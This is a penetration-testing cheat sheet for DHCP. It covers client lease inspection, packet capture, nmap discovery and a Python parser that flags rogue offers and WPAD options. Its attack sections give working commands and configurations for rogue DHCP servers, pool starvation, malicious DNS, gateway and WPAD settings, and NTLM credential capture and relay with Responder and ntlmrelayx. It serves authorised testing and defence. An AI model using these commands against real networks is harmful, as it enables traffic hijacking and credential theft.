# DHCP (Dynamic Host Configuration Protocol)

**Default Ports:** 67/UDP (Server), 68/UDP (Client)

DHCP assigns IP addresses, gateways, DNS servers, domain names, and other network options to clients. In internal pentests, DHCP testing can expose rogue servers, weak network controls, WPAD redirection risk, and useful network configuration.
## Connect

### Using dhclient

dhclient shows the configuration a normal client receives.

```bash
sudo dhclient -v eth0
sudo dhclient -r eth0
sudo dhclient -v -I test-client-01 eth0
```
### Using NetworkManager

NetworkManager shows the DHCP values applied to the host.

```bash
nmcli connection show --active
nmcli connection down "Wired connection 1"
nmcli connection up "Wired connection 1"
nmcli device show eth0
```
### Packet Capture

Passive packet capture is the safest way to observe DHCP offers, since it sends nothing on the wire.

```bash
sudo tcpdump -ni eth0 'udp and (port 67 or port 68)'
sudo tcpdump -ni eth0 -w dhcp.pcap 'udp and (port 67 or port 68)'
```
## Recon

### DHCP Discovery

Broadcast discovery identifies DHCP servers on the local VLAN.

```bash
sudo nmap --script broadcast-dhcp-discover -e eth0
sudo nmap --script broadcast-dhcp-discover --packet-trace -e eth0
```
### Identify DHCP Servers

Look for unexpected server identifiers (option 54) or multiple offers answering a single discover.

```bash
sudo tcpdump -ni eth0 -vvv 'udp and (port 67 or port 68)'

# Interesting options:
#  53  DHCP Message Type
#  54  Server Identifier
#   3  Router
#   6  DNS Server
#  15  Domain Name
# 252  WPAD
```
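As an added example (not part of the original cheat sheet), the following Python parses the option list of a DHCP message and flags what the capture review above looks for: an offer whose server identifier (option 54) is not on an allow list, a WPAD option 252, and the DNS servers handed out. The `KNOWN_SERVERS` set, the 192.168.56.x addresses and the DHCPOFFER built by `build_offer` are constructed assumptions; in practice you would feed `review_offer` the UDP payload of each offer from the pcap captured above.

```python
from ipaddress import IPv4Address
MAGIC_COOKIE = b"\x63\x82\x53\x63"   # RFC 2132: options follow this cookie at offset 236
KNOWN_SERVERS = {"192.168.56.2"}     # assumed legitimate DHCP server(s) for this network

def parse_dhcp(payload):
    """Parse a BOOTP/DHCP UDP payload into the offered address and a {code: value} option map."""
    if payload[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message: magic cookie missing")
    opts, i = {}, 240
    while i < len(payload):
        code = payload[i]
        if code == 255:                  # end-of-options marker
            break
        if code == 0:                    # pad byte, no length field
            i += 1
        else:
            length = payload[i + 1]
            opts[code] = payload[i + 2:i + 2 + length]
            i += 2 + length
    return {"yiaddr": str(IPv4Address(payload[16:20])), "options": opts}

def ip_list(raw):  # decode an option holding one or more packed IPv4 addresses (e.g. option 6)
    return [str(IPv4Address(raw[k:k + 4])) for k in range(0, len(raw), 4)]

def review_offer(payload):
    """Return findings for a DHCPOFFER: unexpected server identifier, WPAD, DNS handed out."""
    opts = parse_dhcp(payload)["options"]
    findings = []
    if opts.get(53) != b"\x02":          # option 53 value 2 = DHCPOFFER; ignore other types
        return findings
    server_id = ip_list(opts[54])[0] if 54 in opts else "missing"
    if server_id not in KNOWN_SERVERS:
        findings.append(f"offer from unexpected server {server_id}")
    if 252 in opts:
        findings.append("WPAD option 252 present: " + opts[252].decode(errors="replace"))
    if 6 in opts:
        findings.append("DNS via DHCP: " + ", ".join(ip_list(opts[6])))
    return findings

def build_offer(server_ip, wpad_url=None):
    """Constructed DHCPOFFER (not a real capture): options 53, 54, 3, 6, 15 and optionally 252."""
    header = bytes([2, 1, 6, 0]) + b"\x00" * 12 + IPv4Address("192.168.56.150").packed + b"\x00" * 216
    server = IPv4Address(server_ip).packed
    opts = b"\x35\x01\x02" + b"\x36\x04" + server + b"\x03\x04" + server + b"\x06\x04" + server + b"\x0f\x04corp"
    if wpad_url:
        opts += bytes([252, len(wpad_url)]) + wpad_url.encode()
    return header + MAGIC_COOKIE + opts + b"\xff"

if __name__ == "__main__":
    print(review_offer(build_offer("192.168.56.1", "http://192.168.56.1/wpad.dat")))
```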
### Lease Review

Lease files record the DHCP options the client accepted.

```bash
cat /var/lib/dhcp/dhclient.leases
grep -Ei 'routers|domain-name|domain-name-servers|ntp|wpad' /var/lib/dhcp/dhclient.leases
```
## Enumeration

### DHCP Options

Enumerate the assigned network options for DNS, gateway, domain, NTP, PXE, and WPAD.

```bash
sudo nmap --script broadcast-dhcp-discover -e eth0
nmcli device show eth0 | grep -Ei 'IP4.DNS|IP4.GATEWAY|DOMAIN|DHCP'
```
### WPAD Enumeration

DHCP option 252 may point clients to a proxy auto-config (PAC) file.

```bash
sudo tcpdump -ni eth0 -vvv 'udp and (port 67 or port 68)' | grep -i wpad
curl -I http://wpad/wpad.dat
```
### PXE Enumeration

PXE options may reveal boot servers and deployment infrastructure.

```bash
sudo tcpdump -ni eth0 -vvv 'udp and (port 67 or port 68)' | grep -Ei 'tftp|boot|pxe|next-server'
```
## Attack Vectors

### Rogue DHCP Server

A rogue server can provide malicious gateway, DNS, or WPAD settings.

```bash
sudo yersinia -G
sudo bettercap -iface eth0
```
### DHCP Starvation

Starvation exhausts the address pool and can force clients toward rogue services.

```bash
sudo yersinia dhcp -attack 1
sudo macof -i eth0
```
### Malicious DNS or Gateway

Changing the DNS (option 6) or router (option 3) values can redirect client traffic.

```ini
# Example dnsmasq test configuration
interface=eth0
dhcp-range=192.168.56.100,192.168.56.200,12h
dhcp-option=3,192.168.56.1
dhcp-option=6,192.168.56.1
```
### WPAD Redirection

WPAD can redirect HTTP proxy discovery to attacker-controlled infrastructure.

```ini
# dnsmasq DHCP option 252
dhcp-option=252,http://192.168.56.1/wpad.dat
```
## Post-Exploitation

### Network Mapping

DHCP options help map network infrastructure.

```bash
grep -Ei 'routers|domain-name|domain-name-servers|ntp|wpad|next-server' /var/lib/dhcp/dhclient.leases
```
### Credential Capture Review

WPAD and DNS redirection tests may trigger proxy authentication attempts.

```bash
sudo responder -I eth0 -w -F
sudo ntlmrelayx.py -tf targets.txt -smb2support
```
## Useful Tools

| Tool | Purpose |
|---|---|
| tcpdump | DHCP packet capture |
| nmap | Broadcast DHCP discovery |
| dhclient | Client lease testing |
| nmcli | Applied DHCP settings |
| yersinia | DHCP attack testing |
| dnsmasq | Controlled rogue DHCP lab testing |
| Responder | WPAD credential capture testing |
## Security Misconfigurations

| Misconfiguration | Risk |
|---|---|
| No DHCP snooping | Rogue DHCP attacks |
| Multiple unexpected DHCP servers | Client redirection |
| WPAD option enabled broadly | Proxy credential capture |
| Untrusted DNS via DHCP | Traffic redirection |
| PXE options exposed | Deployment infrastructure leakage |
| No port security | DHCP starvation risk |